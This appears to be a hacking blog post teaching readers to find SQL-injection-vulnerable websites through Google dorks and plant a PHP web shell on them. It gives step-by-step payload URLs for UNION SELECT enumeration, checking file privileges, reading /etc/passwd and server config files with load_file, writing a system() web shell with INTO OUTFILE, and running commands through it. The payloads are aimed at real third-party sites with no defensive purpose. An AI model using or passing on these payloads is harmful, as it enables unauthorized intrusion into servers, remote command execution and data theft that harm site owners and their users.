How to upload Web-Shell without admin panel

How to upload Web-Shell without admin panel

hello guys, welcome back to another article, in today’s article I am going to show how to upload Web-Shell without an admin panel

so many of you get curious about how it can be possible? you’ll get the answer in this article so be with me and subscribe to notification

many of you know about SQL-Injection, I hope you know cause I am going to use SQL-injection for uploading web-shell

so let’s start, I am not explaining Basics in this article if you don’t know I suggest you this article SQL injection in PHP.

first, find SQL-Injection vulnerable website using google dorks, I hope you’ll get one

Example:

https://www.website.com/index.php?id=1′ — –

then find the number of columns using order by 

Example:

https://www.website.com/index.php?id=1′ order by 1 — – (no error)

https://www.website.com/index.php?id=1′ order by 2 — – (no error)

https://www.website.com/index.php?id=1′ order by 3 — – (no error)

.

.

https://www.website.com/index.php?id=1′ order by 7 — –  (got the error Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in/home/abc/public_html/functions.php )

so we got the total number of columns, now find vulnerable columns using union select, I hope you will find vulnerable columns, I found column number 3 and 4 vulnerable

now let’s check the database users privileges for writing file using file_priv 

Example:

https://www.website.com/index.php?id=1′ union select 1,2,file_priv,4,5,6 FROM mysql.user where user=user() — –

if this will show you (Y)  in place of the vulnerable column that means a current user can write files in websites directory

ohyeah

if you don’t get try on another website this website not gonna work for this trick

now let’s try to write a file in website’s directory, do as shown in below example

https://www.website.com/index.php?id=1′ union select 1,2,”<?system($_REQUEST[‘cmd’]);?>”,4,5,6 into outfile ‘/home/site/public_html/abc/WRITABLE_DIRECTORY(uploads)/shell.php’ — –

! important: you have to enter the full path of a directory you want to write file

Where you can get the full path?

normally full path of the website on the server displayed in SQL Injection error

if you didn’t fount the path in SQL Injection error then follow below steps

 Step 1:

https://www.website.com/index.php?id=1′ union select 1,2,load_file(‘/etc/passwd’),4,5,6 — –

now server’s passwd file is displayed you have to find conf file name of the current website (Example: abc.conf)

Step 2:

you have to access one more file to get the full path of the website Example shown below

https://www.website.com/index.php?id=1′ union select 1,2,load_file(‘/etc/abc.conf’),4,5,6 — –

above example will load the conf file and you get the full path

that’s how you can upload the file using SQL Injection without an admin panel

and now final step let’s access uploaded file

Hell yeah

https://www.website.com/WRITABLE_DIRECTORY(uploads)/shell.php?cmd=whoami

thank you for reading this article, if you found this article informative share with your hacker friends see you in next article 😁

 

Add a Comment

Your email address will not be published. Required fields are marked *